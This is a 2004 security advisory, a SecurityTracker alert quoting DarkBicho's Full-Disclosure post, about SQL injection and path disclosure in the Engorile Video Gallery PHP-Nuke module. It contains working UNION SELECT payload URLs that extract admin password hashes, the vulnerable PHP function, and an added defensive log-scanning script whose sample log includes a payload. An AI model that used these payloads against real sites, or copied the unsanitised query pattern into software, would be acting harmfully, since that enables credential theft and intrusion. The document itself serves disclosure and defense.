Engorile Video Gallery Insufficient Input Validation in 'clipid' and 'catid' Lets Remote Users Inject SQL Commands

SecurityTracker Alert ID: 1009951
CVE Reference: GENERIC-MAP-NOMATCH
Updated: Apr 27 2004
Original Entry Date: Apr 27 2004
Impact: Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network
Exploit Included: Yes
Version(s): 0.1 Beta 5
Description: DarkBicho reported several vulnerabilities in Engorile Video Gallery. A remote user can inject SQL commands to be executed by the underlying database. A remote user can also determine the installation path.

It is reported that the software does not properly validate user-supplied input in the 'catid' and 'clipid' parameters. A remote user can submit a specially crafted URL to execute arbitrary SQL commands on the target system. The flaw reportedly resides in the render_detail_clip() function. Some demonstration exploit URLs are provided:

http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
http://[target]/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1

It is also reported that a remote user can determine the installation path by submitting an invalid value for the 'catid' or 'clipid' parameter. Some demonstration exploit URLs are provided:

http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1

The vendor has reportedly been notified.
Impact: A remote user can inject SQL commands to be executed on the database. This can be used, for example, to retrieve usernames and hashed password values.
A remote user can determine the installation path.
Solution: No solution was available at the time of this entry. The vendor reportedly plans to issue a fix.
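
Added example (not part of the SecurityTracker entry or of DarkBicho's advisory): both reported issues are triggered by a 'clipid' or 'catid' value that is not a plain integer, so a single access-log check covers the SQL injection and the path-disclosure requests. The log lines are constructed samples in Apache combined-log style, and the function names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = """\
198.51.100.7 - - [27/Apr/2004:10:01:02 +0000] "GET /modules.php?name=Video_Gallery&l_op=viewclip&clipid=12&catid=1 HTTP/1.1" 200 5120
198.51.100.9 - - [27/Apr/2004:10:02:10 +0000] "GET /modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho HTTP/1.1" 200 734
198.51.100.9 - - [27/Apr/2004:10:02:31 +0000] "GET /modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1 HTTP/1.1" 200 911
203.0.113.4 - - [27/Apr/2004:10:03:00 +0000] "GET /modules.php?name=News&file=article&sid=3 HTTP/1.1" 200 8000
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ID_PARAMS = ("clipid", "catid")          # the two parameters named in the advisory
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)


def classify(line):
    """Return (param, decoded_value, label) for each suspicious id in one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    # parse_qs percent-decodes values, so %20UNION%20SELECT is seen as text.
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if query.get("name", [""])[0] != "Video_Gallery":
        return []
    findings = []
    for param in ID_PARAMS:
        for value in query.get(param, []):
            if value.isascii() and value.isdigit():
                continue                  # a legitimate id is digits only
            label = "union-select" if UNION_RE.search(value) else "non-numeric"
            findings.append((param, value, label))
    return findings


def scan(log_text):
    """Return (line_number, param, value, label) for every finding in the log."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        hits.extend((lineno,) + finding for finding in classify(line))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
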

Vendor URL: videogallery.engorile.com/
Cause: Access control error, Input validation error
Underlying OS: Linux (Any), UNIX (Any)
Reported By: "k1LL3r B0y" <k1ll3rb0y@hotmail.com>
Message History: None.

Source Message Contents

Date: Mon, 26 Apr 2004 23:59:41 +0200
From: "k1LL3r B0y" <k1ll3rb0y@hotmail.com>
Subject: [Full-Disclosure] Multiple vulnerabilities PHP-Nuke Video Gallery Module for PHP-Nuke

Advisory: http://bichosoft.webcindario.com/advisory-03.txt
===========================================================================
=================== Multiple vulnerabilities PHP-Nuke =====================
=================== Video Gallery Module for PHP-Nuke =====================
PROGRAM: PHP-Nuke Video Gallery Module for PHP-Nuke
HOMEPAGE: http://videogallery.engorile.com/
VERSION: 0.1 Beta 5
BUG: Multiple vulnerabilities
DATE: 26/04/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@peru.com
===========================================================================
===========================================================================
Vulnerabilities:
---------------
1.- CODE:
¨¨¨¨
================================ CODE ===================================
function render_detail_clip($clipid, $catid){
    global $prefix, $dbi, $module_name;
    $tipomime="application/unknown";
    $next=next_clips($clipid, $catid);
    // $clipid goes into the SQL text as received: unquoted and unvalidated
    $result=sql_query("select descripcion, url_thumb, url_preview, accesos from ".$prefix."_videos_clips where clipid=$clipid", $dbi);
    // the row is fetched without checking that the query succeeded
    list($descripcion, $url_thumb, $url_preview, $accesos)=sql_fetch_row($result, $dbi);
    $resultado=AbreTabla();
    if ($next["previous"]){
        $resultado.="<a href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["previous"]."&catid=$catid>"._PREVIOUS."</a>";
    }
    $resultado.="</td><td align=right>";
    if ($next["next"]){
        $resultado.="<a href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["next"]."&catid=$catid>"._NEXT."</a>";
    }
    $resultado.=CierraTabla().AbreTabla().$descripcion."</td></tr><tr><td>";
    if ($url_preview != ""){
        $tipomime=tipomime($clipid, "clips");
        $result2=sql_query("select class_id, options_object, options_embed from ".$prefix."_videos_tipos where tipomime='$tipomime'", $dbi);
        list($class_id, $options_object, $options_embed)=sql_fetch_row($result2, $dbi);
        $resultado.="<center>".mete_video($url_preview, $tipomime, 160, 120)."</center>";
    }
    else{
        $resultado.="<center><img src=\"$url_thumb\"></center>";
    }
    $resultado.=CierraTabla().AbreTabla().votacion_clip($clipid, $catid);
    if (count_total($clipid, "clip", "ficheros") > 0){
        $resultado.=CierraTabla().AbreTabla().clip_files($clipid, $catid).CierraTabla();
    }
    else{
        $resultado.=CierraTabla();
    }
    $accesos++;
    // $clipid is interpolated into a second statement here
    sql_query("update ".$prefix."_videos_clips set accesos=$accesos where clipid=$clipid", $dbi);
    return "$resultado";
}
=========================================================================
2.- Full path disclosure:
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.
A)
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL
result resource in
/home/hosting/php-nuke/includes/sql_layer.php on line 286
B)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL
result resource in
/home/hosting/php-nuke/includes/sql_layer.php on line 286
3.- Sql injection:
¨¨¨¨¨¨¨¨¨¨¨¨¨¨
This sql injection exploit can pull out from database any information,
for example
superadmin's username and password's md5 hash:
A)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
B)
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
C)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
D)
http://[target]/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the Video Gallery website for updates and official release
details.